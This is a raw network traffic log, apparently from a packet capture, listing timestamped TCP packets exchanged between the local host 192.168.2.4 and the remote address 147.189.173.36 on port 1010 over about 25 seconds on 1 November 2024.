                                            Nov 1, 2024 06:22:49.663297892 CET497911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:49.763675928 CET497921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:49.768691063 CET101049792147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:49.768774986 CET497921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:49.789105892 CET497921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:49.794189930 CET101049792147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:49.794254065 CET497921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:49.799160004 CET101049792147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:50.504183054 CET101049792147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:50.537981987 CET101049792147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:50.538043976 CET497921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:50.538877964 CET497921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:50.544642925 CET101049792147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:50.544697046 CET497921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:50.655066013 CET497941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:50.660056114 CET101049794147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:50.660134077 CET497941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:50.691634893 CET497941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:50.696825981 CET101049794147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:50.696897030 CET497941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:50.701689005 CET101049794147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:51.335969925 CET101049794147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:51.369060040 CET101049794147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:51.369134903 CET497941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:51.369632006 CET497941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:51.374850035 CET101049794147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:51.374979019 CET497941010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:51.482391119 CET497951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:51.487605095 CET101049795147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:51.488554955 CET497951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:51.515651941 CET497951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:51.520658016 CET101049795147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:51.524544954 CET497951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:51.529560089 CET101049795147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:52.173748970 CET101049795147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:52.206438065 CET101049795147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:52.207110882 CET497951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:52.207648993 CET497951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:52.212917089 CET101049795147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:52.216535091 CET497951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:52.329591036 CET497961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:52.334780931 CET101049796147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:52.334872007 CET497961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:52.427809954 CET497961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:52.432813883 CET101049796147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:52.433867931 CET497961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:52.438699961 CET101049796147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:53.005450964 CET101049796147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:53.038702965 CET101049796147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:53.038789034 CET497961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:53.039504051 CET497961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:53.045022011 CET101049796147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:53.045075893 CET497961010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:53.154949903 CET497971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:53.159873962 CET101049797147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:53.159955025 CET497971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:53.255486965 CET497971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:53.260392904 CET101049797147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:53.260453939 CET497971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:53.265533924 CET101049797147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:53.838160038 CET101049797147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:53.871651888 CET101049797147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:53.871710062 CET497971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:53.872903109 CET497971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:53.877975941 CET101049797147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:53.878040075 CET497971010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:53.982217073 CET497991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:53.987195015 CET101049799147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:53.987262964 CET497991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:54.010983944 CET497991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:54.015818119 CET101049799147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:54.015887976 CET497991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:54.020746946 CET101049799147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:55.390523911 CET101049799147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:55.390552044 CET101049799147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:55.390593052 CET101049799147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:55.390722990 CET497991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:55.390722990 CET497991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:55.390747070 CET101049799147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:55.390793085 CET497991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:55.390902042 CET101049799147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:55.390944958 CET497991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:55.391333103 CET497991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:55.396405935 CET101049799147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:55.396476984 CET497991010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:55.497936010 CET498001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:55.502839088 CET101049800147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:55.502911091 CET498001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:55.513464928 CET498001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:55.518244028 CET101049800147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:55.518291950 CET498001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:55.523129940 CET101049800147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:56.175594091 CET101049800147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:56.209151030 CET101049800147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:56.209296942 CET498001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:56.393224001 CET498001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:56.398554087 CET101049800147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:56.398627996 CET498001010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:56.560422897 CET498061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:56.565505028 CET101049806147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:56.565587044 CET498061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:56.588252068 CET498061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:56.601111889 CET101049806147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:56.601203918 CET498061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:56.610786915 CET101049806147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:57.933944941 CET101049806147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:57.933964014 CET101049806147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:57.933976889 CET101049806147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:57.934060097 CET498061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:57.934061050 CET498061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:57.934650898 CET498061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:57.935340881 CET101049806147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:57.935408115 CET498061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:57.939889908 CET101049806147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:57.939951897 CET498061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.044620991 CET498071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.049762964 CET101049807147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:58.049868107 CET498071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.077366114 CET498071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.082139969 CET101049807147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:58.082211971 CET498071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.087059021 CET101049807147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:58.717961073 CET101049807147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:58.750386000 CET101049807147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:58.750437021 CET498071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.751095057 CET498071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.762325048 CET101049807147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:58.762382030 CET498071010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.873647928 CET498131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.878700972 CET101049813147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:58.878781080 CET498131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.899189949 CET498131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.904777050 CET101049813147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:58.904876947 CET498131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:58.910051107 CET101049813147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:59.588838100 CET101049813147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:59.622054100 CET101049813147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:59.622273922 CET498131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:59.622905016 CET498131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:59.628242016 CET101049813147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:59.628302097 CET498131010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:59.733194113 CET498191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:59.741409063 CET101049819147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:59.741478920 CET498191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:59.769093037 CET498191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:59.774631023 CET101049819147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:59.774687052 CET498191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:59.780848026 CET101049819147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:00.415935993 CET101049819147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:00.447968960 CET101049819147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:00.448035002 CET498191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:00.448647022 CET498191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:00.454082966 CET101049819147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:00.454137087 CET498191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:00.560492992 CET498251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:00.565762043 CET101049825147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:00.565845013 CET498251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:00.589768887 CET498251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:00.594834089 CET101049825147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:00.594922066 CET498251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:00.599963903 CET101049825147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:01.247493029 CET101049825147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:01.278973103 CET101049825147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:01.279028893 CET498251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:01.279635906 CET498251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:01.285176039 CET101049825147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:01.285237074 CET498251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:01.388520956 CET498311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:01.393371105 CET101049831147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:01.393459082 CET498311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:01.414088011 CET498311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:01.419060946 CET101049831147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:01.422966957 CET498311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:01.427800894 CET101049831147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:02.055037022 CET101049831147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:02.088185072 CET101049831147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:02.088501930 CET498311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:02.088959932 CET498311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:02.094124079 CET101049831147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:02.094203949 CET498311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:02.201051950 CET498371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:02.206736088 CET101049837147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:02.206832886 CET498371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:02.232834101 CET498371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:02.238610983 CET101049837147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:02.238696098 CET498371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:02.245090961 CET101049837147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:02.898478031 CET101049837147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:02.931870937 CET101049837147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:02.931997061 CET498371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:02.932573080 CET498371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:02.938158035 CET101049837147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:02.938229084 CET498371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:03.045084953 CET498431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:03.050266981 CET101049843147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:03.050332069 CET498431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:03.078692913 CET498431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:03.084228992 CET101049843147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:03.084280968 CET498431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:03.091260910 CET101049843147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:03.761233091 CET101049843147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:03.788799047 CET101049843147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:03.788918018 CET498431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:03.796046019 CET498431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:03.804250002 CET101049843147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:03.806910992 CET498431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.034651041 CET498491010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.039849043 CET101049849147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:04.040687084 CET498491010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.118278980 CET498491010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.123522043 CET101049849147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:04.123574972 CET498491010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.128562927 CET101049849147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:04.730515003 CET101049849147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:04.763416052 CET101049849147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:04.763465881 CET498491010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.764448881 CET498491010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.769602060 CET101049849147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:04.769653082 CET498491010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.872801065 CET498551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.877760887 CET101049855147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:04.877840042 CET498551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.905424118 CET498551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.911694050 CET101049855147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:04.911753893 CET498551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:04.917640924 CET101049855147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:05.557040930 CET101049855147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:05.578843117 CET101049855147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:05.579386950 CET498551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:05.579951048 CET498551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:05.585146904 CET101049855147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:05.586237907 CET498551010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:05.685468912 CET498601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:05.690896034 CET101049860147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:05.692589045 CET498601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:05.703569889 CET498601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:05.708616018 CET101049860147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:05.712580919 CET498601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:05.718262911 CET101049860147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:06.415355921 CET101049860147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:06.448298931 CET101049860147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:06.448362112 CET498601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:06.448848009 CET498601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:06.454739094 CET101049860147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:06.454798937 CET498601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:06.562509060 CET498671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:06.569072008 CET101049867147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:06.570632935 CET498671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:06.598428011 CET498671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:06.604537964 CET101049867147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:06.606590033 CET498671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:06.611579895 CET101049867147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:07.243685961 CET101049867147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:07.270958900 CET101049867147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:07.272592068 CET498671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:07.273130894 CET498671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:07.278531075 CET101049867147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:07.278620958 CET498671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:07.388433933 CET498721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:07.394942045 CET101049872147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:07.396337032 CET498721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:07.406374931 CET498721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:07.411372900 CET101049872147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:07.412568092 CET498721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:07.417640924 CET101049872147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:08.050115108 CET101049872147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:08.083453894 CET101049872147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:08.083619118 CET498721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:08.084167004 CET498721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:08.089494944 CET101049872147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:08.089546919 CET498721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:08.211414099 CET498771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:08.216345072 CET101049877147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:08.216473103 CET498771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:08.242748976 CET498771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:08.247946024 CET101049877147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:08.248023987 CET498771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:08.252763033 CET101049877147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:08.883260012 CET101049877147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:08.916781902 CET101049877147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:08.916974068 CET498771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:08.917943954 CET498771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:08.923301935 CET101049877147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:08.923362970 CET498771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.029789925 CET498831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.034925938 CET101049883147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:09.035031080 CET498831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.061069012 CET498831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.065926075 CET101049883147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:09.066003084 CET498831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.070779085 CET101049883147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:09.713233948 CET101049883147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:09.746284008 CET101049883147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:09.746642113 CET498831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.747498989 CET498831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.752798080 CET101049883147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:09.753936052 CET498831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.857731104 CET498891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.862791061 CET101049889147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:09.862864971 CET498891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.901644945 CET498891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.907246113 CET101049889147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:09.907303095 CET498891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:09.912513018 CET101049889147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:10.573807001 CET101049889147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:10.606863022 CET101049889147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:10.606945992 CET498891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:10.607801914 CET498891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:10.613207102 CET101049889147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:10.613316059 CET498891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:10.718758106 CET498951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:10.723683119 CET101049895147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:10.723807096 CET498951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:10.764468908 CET498951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:10.769285917 CET101049895147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:10.769366026 CET498951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:10.774550915 CET101049895147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:11.413486004 CET101049895147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:11.446569920 CET101049895147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:11.446640968 CET498951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:11.447405100 CET498951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:11.452687979 CET101049895147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:11.452758074 CET498951010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:11.600110054 CET499011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:11.604943991 CET101049901147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:11.605034113 CET499011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:11.646889925 CET499011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:11.651776075 CET101049901147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:11.651859045 CET499011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:11.656694889 CET101049901147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:12.279680967 CET101049901147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:12.312813997 CET101049901147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:12.312887907 CET499011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:12.313759089 CET499011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:12.318847895 CET101049901147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:12.318934917 CET499011010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:12.435919046 CET499061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:12.440677881 CET101049906147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:12.441674948 CET499061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:13.398245096 CET499061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:13.643472910 CET101049906147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:13.643589020 CET499061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:13.648473024 CET101049906147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:13.814091921 CET101049906147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:13.846935034 CET101049906147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:13.847007990 CET499061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:13.847750902 CET499061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:13.853063107 CET101049906147.189.173.36192.168.2.4
